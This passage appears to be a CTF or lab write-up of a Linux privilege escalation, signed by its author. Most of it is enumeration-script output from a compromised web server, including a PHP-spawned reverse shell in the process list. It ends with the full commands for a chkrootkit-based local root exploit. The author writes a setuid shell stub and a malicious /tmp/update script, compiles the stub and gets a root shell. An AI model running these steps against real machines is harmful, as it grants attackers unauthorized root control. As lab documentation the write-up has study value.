                    -rwxr-xr-x  1 root root  2032 Jun  4  2014 chkrootkit
                    -rwxr-xr-x  1 root root   256 Oct 14  2013 dpkg
                    -rwxr-xr-x  1 root root   338 Dec 20  2011 lighttpd
                    -rwxr-xr-x  1 root root   372 Oct  4  2011 logrotate
                    -rwxr-xr-x  1 root root  1365 Dec 28  2012 man-db
                    -rwxr-xr-x  1 root root   606 Aug 17  2011 mlocate
                    -rwxr-xr-x  1 root root   249 Sep 12  2012 passwd
                    -rwxr-xr-x  1 root root  2417 Jul  1  2011 popularity-contest
                    -rwxr-xr-x  1 root root  2947 Jun 19  2012 standard

                    /etc/cron.hourly:
                    total 12
                    drwxr-xr-x  2 root root 4096 Mar 30  2016 .
                    drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

                    /etc/cron.monthly:
                    total 12
                    drwxr-xr-x  2 root root 4096 Mar 30  2016 .
                    drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

                    /etc/cron.weekly:
                    total 20
                    drwxr-xr-x  2 root root 4096 Mar 30  2016 .
                    drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root  102 Jun 19  2012 .placeholder
                    -rwxr-xr-x  1 root root  730 Sep 13  2013 apt-xapian-index
                    -rwxr-xr-x  1 root root  907 Dec 28  2012 man-db


                    Crontab contents:
                    # /etc/crontab: system-wide crontab
                    # Unlike any other crontab you don't have to run the `crontab'
                    # command to install the new version when you edit this file
                    # and files in /etc/cron.d. These files also have username fields,
                    # that none of the other crontabs do.

                    SHELL=/bin/sh
                    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

                    # m h dom mon dow user command
                    17 * * * * root    cd / && run-parts --report /etc/cron.hourly
                    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
                    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
                    52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
                    #


                    ### NETWORKING  ##########################################
                    Network & IP info:
                    eth0      Link encap:Ethernet  HWaddr 00:0c:29:98:f5:19
                              inet addr:192.168.1.9  Bcast:192.168.1.255  Mask:255.255.255.0
                              inet6 addr: fe80::20c:29ff:fe98:f519/64 Scope:Link
                              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                              RX packets:268 errors:0 dropped:0 overruns:0 frame:0
                              TX packets:201 errors:0 dropped:0 overruns:0 carrier:0
                              collisions:0 txqueuelen:1000
                              RX bytes:142432 (142.4 KB)  TX bytes:22042 (22.0 KB)
                              Interrupt:19 Base address:0x2000

                    lo        Link encap:Local Loopback
                              inet addr:127.0.0.1  Mask:255.0.0.0
                              inet6 addr: ::1/128 Scope:Host
                              UP LOOPBACK RUNNING  MTU:65536  Metric:1
                              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
                              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
                              collisions:0 txqueuelen:0
                              RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


                    Nameserver(s):
                    nameserver 192.168.1.1


                    Default route:
                    default         192.168.1.1     0.0.0.0         UG    100    0        0 eth0


                    Listening TCP:
                    Active Internet connections (servers and established)
                    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
                    tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -            
                    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -            
                    tcp        0      0 192.168.1.9:56045       192.168.1.20:443        ESTABLISHED 984/php-cgi  
                    tcp        0      0 192.168.1.9:80          192.168.1.20:48676      ESTABLISHED -            
                    tcp6       0      0 :::22                   :::*                    LISTEN      -            


                    Listening UDP:
                    Active Internet connections (servers and established)
                    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
                    udp        0      0 0.0.0.0:68              0.0.0.0:*                           -            


                    ### SERVICES #############################################
                    Running processes:
                    USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
                    root         1  0.5  0.1   3396  1832 ?        Ss   09:41   0:00 /sbin/init
                    root         2  0.0  0.0      0     0 ?        S    09:41   0:00 [kthreadd]
                    root         3  0.0  0.0      0     0 ?        S    09:41   0:00 [ksoftirqd/0]
                    root         4  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:0]
                    root         5  0.0  0.0      0     0 ?        S<   09:41   0:00 [kworker/0:0H]
                    root         6  0.1  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:0]
                    root         7  0.0  0.0      0     0 ?        S    09:41   0:00 [migration/0]
                    root         8  0.0  0.0      0     0 ?        S    09:41   0:00 [rcu_bh]
                    root         9  0.0  0.0      0     0 ?        S    09:41   0:00 [rcu_sched]
                    root        10  0.0  0.0      0     0 ?        S    09:41   0:00 [watchdog/0]
                    root        11  0.0  0.0      0     0 ?        S<   09:41   0:00 [khelper]
                    root        12  0.0  0.0      0     0 ?        S    09:41   0:00 [kdevtmpfs]
                    root        13  0.0  0.0      0     0 ?        S<   09:41   0:00 [netns]
                    root        14  0.0  0.0      0     0 ?        S<   09:41   0:00 [writeback]
                    root        15  0.0  0.0      0     0 ?        S<   09:41   0:00 [kintegrityd]
                    root        16  0.0  0.0      0     0 ?        S<   09:41   0:00 [bioset]
                    root        17  0.0  0.0      0     0 ?        S<   09:41   0:00 [kworker/u17:0]
                    root        18  0.0  0.0      0     0 ?        S<   09:41   0:00 [kblockd]
                    root        19  0.0  0.0      0     0 ?        S<   09:41   0:00 [ata_sff]
                    root        20  0.0  0.0      0     0 ?        S    09:41   0:00 [khubd]
                    root        21  0.0  0.0      0     0 ?        S<   09:41   0:00 [md]
                    root        22  0.0  0.0      0     0 ?        S<   09:41   0:00 [devfreq_wq]
                    root        23  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:1]
                    root        25  0.0  0.0      0     0 ?        S    09:41   0:00 [khungtaskd]
                    root        26  0.0  0.0      0     0 ?        S    09:41   0:00 [kswapd0]
                    root        27  0.0  0.0      0     0 ?        SN   09:41   0:00 [ksmd]
                    root        28  0.0  0.0      0     0 ?        SN   09:41   0:00 [khugepaged]
                    root        29  0.0  0.0      0     0 ?        S    09:41   0:00 [fsnotify_mark]
                    root        30  0.0  0.0      0     0 ?        S    09:41   0:00 [ecryptfs-kthrea]
                    root        31  0.0  0.0      0     0 ?        S<   09:41   0:00 [crypto]
                    root        43  0.0  0.0      0     0 ?        S<   09:41   0:00 [kthrotld]
                    root        44  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:1]
                    root        45  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_0]
                    root        46  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_1]
                    root        47  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:2]
                    root        48  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:3]
                    root        49  0.0  0.0      0     0 ?        S<   09:41   0:00 [dm_bufio_cache]
                    root        50  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:4]
                    root        69  0.0  0.0      0     0 ?        S<   09:41   0:00 [deferwq]
                    root        70  0.0  0.0      0     0 ?        S<   09:41   0:00 [charger_manager]
                    root        71  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:2]
                    root       193  0.0  0.0      0     0 ?        S<   09:41   0:00 [mpt_poll_0]
                    root       208  0.0  0.0      0     0 ?        S<   09:41   0:00 [mpt/0]
                    root       220  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_2]
                    root       221  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_3]
                    root       227  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_4]
                    root       229  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_5]
                    root       231  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_6]
                    root       232  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_7]
                    root       233  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_8]
                    root       234  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_9]
                    root       237  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_10]
                    root       238  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_11]
                    root       239  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_12]
                    root       240  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_13]
                    root       241  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_14]
                    root       242  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_15]
                    root       243  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_16]
                    root       244  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_17]
                    root       245  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_18]
                    root       246  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_19]
                    root       247  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_20]
                    root       248  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_21]
                    root       249  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_22]
                    root       250  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_23]
                    root       251  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_24]
                    root       252  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_25]
                    root       253  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_26]
                    root       254  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_27]
                    root       255  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_28]
                    root       256  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_29]
                    root       257  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_30]
                    root       258  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_31]
                    root       259  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:5]
                    root       260  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:6]
                    root       261  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:7]
                    root       262  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:8]
                    root       263  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:9]
                    root       264  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:10]
                    root       265  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:11]
                    root       266  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:12]
                    root       267  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:13]
                    root       268  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:14]
                    root       269  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:15]
                    root       270  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:16]
                    root       271  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:17]
                    root       272  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:18]
                    root       273  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:19]
                    root       274  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:20]
                    root       275  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:21]
                    root       276  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:22]
                    root       277  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:23]
                    root       278  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:24]
                    root       279  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:25]
                    root       280  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:26]
                    root       281  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:27]
                    root       282  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:28]
                    root       283  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:29]
                    root       284  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:30]
                    root       285  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:31]
                    root       286  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_32]
                    root       287  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:32]
                    root       379  0.0  0.0      0     0 ?        S    09:41   0:00 [jbd2/sda1-8]
                    root       380  0.0  0.0      0     0 ?        S<   09:41   0:00 [ext4-rsv-conver]
                    root       381  0.0  0.0      0     0 ?        S<   09:41   0:00 [ext4-unrsv-conv]
                    root       469  0.0  0.0   2832   608 ?        S    09:41   0:00 upstart-udev-bridge --daemon
                    root       471  0.0  0.1   3080  1296 ?        Ss   09:41   0:00 /sbin/udevd --daemon
                    102        547  0.0  0.0   3256   652 ?        Ss   09:41   0:00 dbus-daemon --system --fork --activation=upstart
                    syslog     557  0.1  0.1  30036  1472 ?        Sl   09:41   0:00 rsyslogd -c5
                    root       622  0.0  0.0   3020   812 ?        S    09:41   0:00 /sbin/udevd --daemon
                    root       623  0.0  0.0   3020   812 ?        S    09:41   0:00 /sbin/udevd --daemon
                    root       642  0.0  0.0      0     0 ?        S<   09:41   0:00 [ttm_swap]
                    root       706  0.0  0.0      0     0 ?        S<   09:41   0:00 [kpsmoused]
                    root       752  0.0  0.0   2844   348 ?        S    09:41   0:00 upstart-socket-bridge --daemon
                    root       797  0.0  0.0   2924   404 ?        Ss   09:41   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
                    root       819  0.0  0.2   6680  2400 ?        Ss   09:41   0:00 /usr/sbin/sshd -D
                    root       899  0.0  0.0   4628   840 tty4     Ss+  09:41   0:00 /sbin/getty -8 38400 tty4
                    root       903  0.0  0.0   4628   836 tty5     Ss+  09:41   0:00 /sbin/getty -8 38400 tty5
                    root       907  0.0  0.0   4628   844 tty2     Ss+  09:41   0:00 /sbin/getty -8 38400 tty2
                    root       908  0.0  0.0   4628   832 tty3     Ss+  09:41   0:00 /sbin/getty -8 38400 tty3
                    root       912  0.0  0.0   4628   836 tty6     Ss+  09:41   0:00 /sbin/getty -8 38400 tty6
                    root       920  0.0  0.0   2616   884 ?        Ss   09:41   0:00 cron
                    daemon     921  0.0  0.0   2468   348 ?        Ss   09:41   0:00 atd
                    www-data   966  0.0  0.2   8272  2236 ?        S    09:41   0:00 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
                    www-data   968  0.0  0.4  17844  4720 ?        Ss   09:41   0:00 /usr/bin/php-cgi
                    www-data   982  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
                    www-data   983  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
                    www-data   984  0.0  0.2  18100  3072 ?        S    09:41   0:00 /usr/bin/php-cgi
                    www-data   985  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
                    root      1003  0.0  0.0   4628   836 tty1     Ss+  09:41   0:00 /sbin/getty -8 38400 tty1
                    root      1187  0.0  0.0  22584   564 ?        Ssl  09:41   0:00 /usr/sbin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
                    root      1206  0.1  0.5  11268  5660 ?        S    09:41   0:00 /usr/sbin/vmtoolsd
                    root      1230  0.0  0.7  14736  7840 ?        S    09:41   0:00 /usr/lib/vmware-vgauth/VGAuthService -s
                    www-data  1243  0.0  0.0   2232   544 ?        S    09:41   0:00 sh -c uname -a; w; id; /bin/bash -i
                    www-data  1247  0.0  0.1   3448  1708 ?        S    09:41   0:00 /bin/bash -i
                    www-data  3185  0.2  0.1   3412  1428 ?        S    09:43   0:00 /bin/bash ./1.sh
                    www-data  3467  0.0  0.0   3384   644 ?        S    09:43   0:00 /bin/bash ./1.sh
                    www-data  3468  0.0  0.1   2860  1032 ?        R    09:43   0:00 ps aux


                    Process binaries & associated permissions (from above list):
                    -rwxr-xr-x 1 root root 920788 Mar 28  2013 /bin/bash
                    -rwxr-xr-x 2 root root  26696 Mar 29  2012 /sbin/getty
                    -rwxr-xr-x 1 root root 194528 Jan 18  2013 /sbin/init
                    -rwxr-xr-x 1 root root 177552 Jul 19  2013 /sbin/udevd
                    lrwxrwxrwx 1 root root     25 Apr 12  2016 /usr/bin/php-cgi -> /etc/alternatives/php-cgi
                    lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
                    -rwxr-xr-x 1 root root 187332 Dec 20  2011 /usr/sbin/lighttpd
                    -rwxr-xr-x 1 root root 531776 Jan 13  2016 /usr/sbin/sshd
                    lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
                    lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/sbin/vmware-vmblock-fuse -> /usr/lib/vmware-tools/bin32/appLoader


                    /etc/init.d/ binary permissions:
                    total 144
                    drwxr-xr-x  2 root root 4096 Apr 12  2016 .
                    drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root    0 Mar 30  2016 .legacy-bootordering
                    -rw-r--r--  1 root root 2427 Jul 26  2012 README
                    -rwxr-xr-x  1 root root 4596 Sep 25  2012 apparmor
                    lrwxrwxrwx  1 root root   21 Oct 25  2011 atd -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 2444 Jul 26  2012 bootlogd
                    lrwxrwxrwx  1 root root   21 Apr 19  2012 console-setup -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jun 19  2012 cron -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jun 13  2013 dbus -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Nov 26  2013 dmesg -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 1242 Dec 13  2011 dns-clean
                    lrwxrwxrwx  1 root root   21 Mar 14  2012 friendly-recovery -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 1105 Dec 15  2015 grub-common
                    -rwxr-xr-x  1 root root 1329 Jul 26  2012 halt
                    lrwxrwxrwx  1 root root   21 May 26  2011 hostname -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Mar 29  2012 hwclock -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Mar 29  2012 hwclock-save -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Feb  3  2012 irqbalance -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 1293 Jul 26  2012 killprocs
                    -rwxr-xr-x  1 root root 2545 Aug 19  2010 lighttpd
                    lrwxrwxrwx  1 root root   21 Nov 20  2011 module-init-tools -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface-container -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface-security -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 2797 Feb 13  2012 networking
                    -rwxr-xr-x  1 root root  882 Jul 26  2012 ondemand
                    lrwxrwxrwx  1 root root   21 Sep 12  2012 passwd -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-log -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-ready -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-splash -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-stop -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-upstart-bridge -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root  561 Feb  4  2011 pppd-dns
                    lrwxrwxrwx  1 root root   21 Oct 28  2013 procps -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 8635 Jul 26  2012 rc
                    -rwxr-xr-x  1 root root  801 Jul 26  2012 rc.local
                    -rwxr-xr-x  1 root root  117 Jul 26  2012 rcS
                    -rwxr-xr-x  1 root root  639 Jul 26  2012 reboot
                    lrwxrwxrwx  1 root root   21 Sep  8  2012 resolvconf -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 4395 Nov  8  2011 rsync
                    lrwxrwxrwx  1 root root   21 Nov 26  2013 rsyslog -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 4321 Jul 26  2012 sendsigs
                    lrwxrwxrwx  1 root root   21 Apr 19  2012 setvtrgb -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root  590 Jul 26  2012 single
                    -rw-r--r--  1 root root 4304 Jul 26  2012 skeleton
                    -rwxr-xr-x  1 root root 4371 Jan 13  2016 ssh
                    -rwxr-xr-x  1 root root  567 Jul 26  2012 stop-bootlogd
                    -rwxr-xr-x  1 root root 1143 Jul 26  2012 stop-bootlogd-single
                    -rwxr-xr-x  1 root root  700 May 23  2012 sudo
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udev -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udev-fallback-graphics -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udev-finish -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udevmonitor -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udevtrigger -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Apr  5  2012 ufw -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 2800 Jul 26  2012 umountfs
                    -rwxr-xr-x  1 root root 2211 Jul 26  2012 umountnfs.sh
                    -rwxr-xr-x  1 root root 2926 Jul 26  2012 umountroot
                    -rwxr-xr-x  1 root root 1985 Jul 26  2012 urandom


                    ### SOFTWARE #############################################
                    Sudo version:
                    Sudo version 1.8.3p1


                    ### INTERESTING FILES ####################################
                    Useful file locations:
                    /bin/nc
                    /bin/netcat
                    /usr/bin/wget
                    /usr/bin/gcc


                    Installed compilers:
                    ii  gcc                             4:4.6.3-1ubuntu5                  GNU C compiler
                    ii  gcc-4.6                         4.6.3-1ubuntu5                    GNU C compiler


                    Can we read/write sensitive files:
                    -rw-r--r-- 1 root root 953 Apr 12  2016 /etc/passwd
                    -rw-r--r-- 1 root root 620 Mar 30  2016 /etc/group
                    -rw-r--r-- 1 root root 665 Mar 30  2016 /etc/profile
                    -rw-r----- 1 root shadow 810 Apr 25  2016 /etc/shadow


                    Can't search *.conf files as no keyword was entered

                    Can't search *.log files as no keyword was entered

                    Can't search *.ini files as no keyword was entered

                    All *.conf files in /etc (recursive 1 level):
                    -rw-r--r-- 1 root root 604 Oct 19  2011 /etc/deluser.conf
                    -rw-r--r-- 1 root root 350 Mar 30  2016 /etc/popularity-contest.conf
                    -rw-r--r-- 1 root root 552 Feb  8  2012 /etc/pam.conf
                    -rw-r--r-- 1 root root 144 Mar 30  2016 /etc/kernel-img.conf
                    -rw-r--r-- 1 root root 1260 May  2  2011 /etc/ucf.conf
                    -rw-r--r-- 1 root root 3343 Sep 30  2013 /etc/gai.conf
                    -rw-r--r-- 1 root root 92 Apr 19  2012 /etc/host.conf
                    -rw-r--r-- 1 root root 321 Mar 29  2012 /etc/blkid.conf
                    -rw-r--r-- 1 root root 475 Apr 19  2012 /etc/nsswitch.conf
                    -rw-r--r-- 1 root root 2083 Oct 16  2013 /etc/sysctl.conf
                    -rw-r--r-- 1 root root 1263 Sep  5  2013 /etc/rsyslog.conf
                    -rw-r--r-- 1 root root 4728 May  2  2012 /etc/hdparm.conf
                    -rw-r----- 1 root fuse 216 Oct 18  2011 /etc/fuse.conf
                    -rw-r--r-- 1 root root 56 Apr 12  2016 /etc/chkrootkit.conf
                    -rw-r--r-- 1 root root 2981 Mar 30  2016 /etc/adduser.conf
                    -rw-r--r-- 1 root root 6961 Mar 30  2016 /etc/ca-certificates.conf
                    -rw-r--r-- 1 root root 956 Mar 30  2012 /etc/mke2fs.conf
                    -rw-r--r-- 1 root root 333 Mar 30  2016 /etc/updatedb.conf
                    -rw-r--r-- 1 root root 599 Oct  4  2011 /etc/logrotate.conf
                    -rw-r--r-- 1 root root 2969 Mar 15  2012 /etc/debconf.conf
                    -rw-r--r-- 1 root root 15752 Jul 25  2009 /etc/ltrace.conf
                    -rw-r--r-- 1 root root 34 Mar 30  2016 /etc/ld.so.conf
                    -rw-r--r-- 1 root root 839 Apr  9  2012 /etc/insserv.conf


                    Any interesting mail in /var/mail:
                    total 8
                    drwxrwsr-x  2 root mail 4096 Mar 30  2016 .
                    drwxr-xr-x 12 root root 4096 Apr 26  2016 ..


                    ### SCAN COMPLETE ####################################
                    www-data@ubuntu:/tmp$


                    dpkg -l | grep chkrootkit
                    rc  chkrootkit                      0.49-4ubuntu1.1                   rootkit detector

                    echo 'int main(void)' > test.c
                    echo '{ ' >> test.c
                    echo 'setgid(0);' >> test.c
                    echo 'setuid(0);' >> test.c
                    echo 'execl("/bin/sh", "sh", 0);' >> test.c
                    echo '}' >> test.c

                    echo '#!/bin/bash' > update
                    echo 'chown root /tmp/test' >> update
                    echo 'chgrp root /tmp/test' >> update
                    echo 'chmod u+s /tmp/test' >> update

                    gcc test.c -o test
                    gcc test.c -o test
                    test.c: In function 'main':
                    test.c:5:1: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
                    test.c:5:1: warning: missing sentinel in function call [-Wformat]

                    www-data@ubuntu:/tmp$ run-parts

                    drwxr-xr-x 22 root     root      4096 Mar 30  2016 ..
                    -rwxr-xr-x  1 www-data www-data 40155 Jan  5 09:42 1.sh
                    -rw-r--r--  1 www-data www-data 40155 Jan  5 09:43 2.py
                    -rw-r--r--  1 www-data www-data 36801 Jan  5 09:43 3.sh
                    -rw-r--r--  1 www-data www-data  5123 Jan  5 09:48 37292.c
                    drwxrwxrwt  2 root     root      4096 Jan  5 09:41 VMwareDnD
                    srwxr-xr-x  1 www-data www-data     0 Jan  5 09:41 php.socket-0
                    -rwsrwxrwx  1 root     root      7235 Jan  5 09:59 test
                    -rw-rw-rw-  1 www-data www-data    69 Jan  5 09:56 test.c
                    -rw-rw-rw-  1 www-data www-data     2 Jan  5 09:55 test.cls
                    -rwxrwxrwx  1 www-data www-data    74 Jan  5 09:57 update
                    -rw-rw-rw-  1 www-data www-data    20 Jan  5 09:56 updatels
                    -rw-r--r--  1 root     root      1600 Jan  5 09:41 vgauthsvclog.txt.0
                    drwx------  2 root     root      4096 Jan  5 09:41 vmware-root

                    www-data@ubuntu:/tmp$ ./test
                    ./test
                    whoami
                    root


                    Regards,
                    Yuriy Stanchev/URIX